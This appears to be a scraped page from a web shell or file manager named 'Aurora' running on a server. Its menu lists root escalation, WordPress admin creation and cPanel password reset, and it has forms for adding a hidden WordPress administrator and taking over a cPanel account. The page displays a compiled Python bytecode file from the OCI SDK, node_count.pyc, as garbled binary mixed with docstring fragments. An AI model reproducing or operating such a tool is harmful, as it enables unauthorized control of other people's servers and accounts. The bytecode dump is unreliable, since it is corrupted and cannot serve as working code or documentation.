Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
oci
data_flow
models
__pycache__
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: node_count.cpython-39.pyc
a ���f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sd e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zd d� Z dd � Z dd� ZdS )� NodeCountzZ An object with a logical shape and count of the number of nodes with that shape. c K s( ddd�| _ ddd�| _d| _d| _dS )a� Initializes a new NodeCount object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param logical_shape: The value to assign to the logical_shape property of this NodeCount. :type logical_shape: str :param count: The value to assign to the count property of this NodeCount. :type count: int �str�int)� logical_shape�countZlogicalShaper N)Z swagger_typesZ attribute_map�_logical_shape�_count)�self�kwargs� r �C/usr/lib/python3.9/site-packages/oci/data_flow/models/node_count.py�__init__ s ��zNodeCount.__init__c C s | j S )z� Gets the logical_shape of this NodeCount. The compute shape of the nodes that the count is for. :return: The logical_shape of this NodeCount. :rtype: str �r �r r r r r - s zNodeCount.logical_shapec C s || _ dS )z� Sets the logical_shape of this NodeCount. The compute shape of the nodes that the count is for. :param logical_shape: The logical_shape of this NodeCount. :type: str Nr )r r r r r r 9 s c C s | j S )z� Gets the count of this NodeCount. The node count of this compute shape. :return: The count of this NodeCount. :rtype: int �r r r r r r E s zNodeCount.countc C s || _ dS )z� Sets the count of this NodeCount. The node count of this compute shape. :param count: The count of this NodeCount. :type: int Nr )r r r r r r Q s c C s t | �S �N)r r r r r �__repr__] s zNodeCount.__repr__c C s |d u rdS | j |j kS )NF)�__dict__�r �otherr r r �__eq__` s zNodeCount.__eq__c C s | |k S r r r r r r �__ne__f s zNodeCount.__ne__N)�__name__� __module__�__qualname__�__doc__r �propertyr �setterr r r r r r r r r s r N)Zoci.utilr r r Zoci.decoratorsr �objectr r r r r �<module> s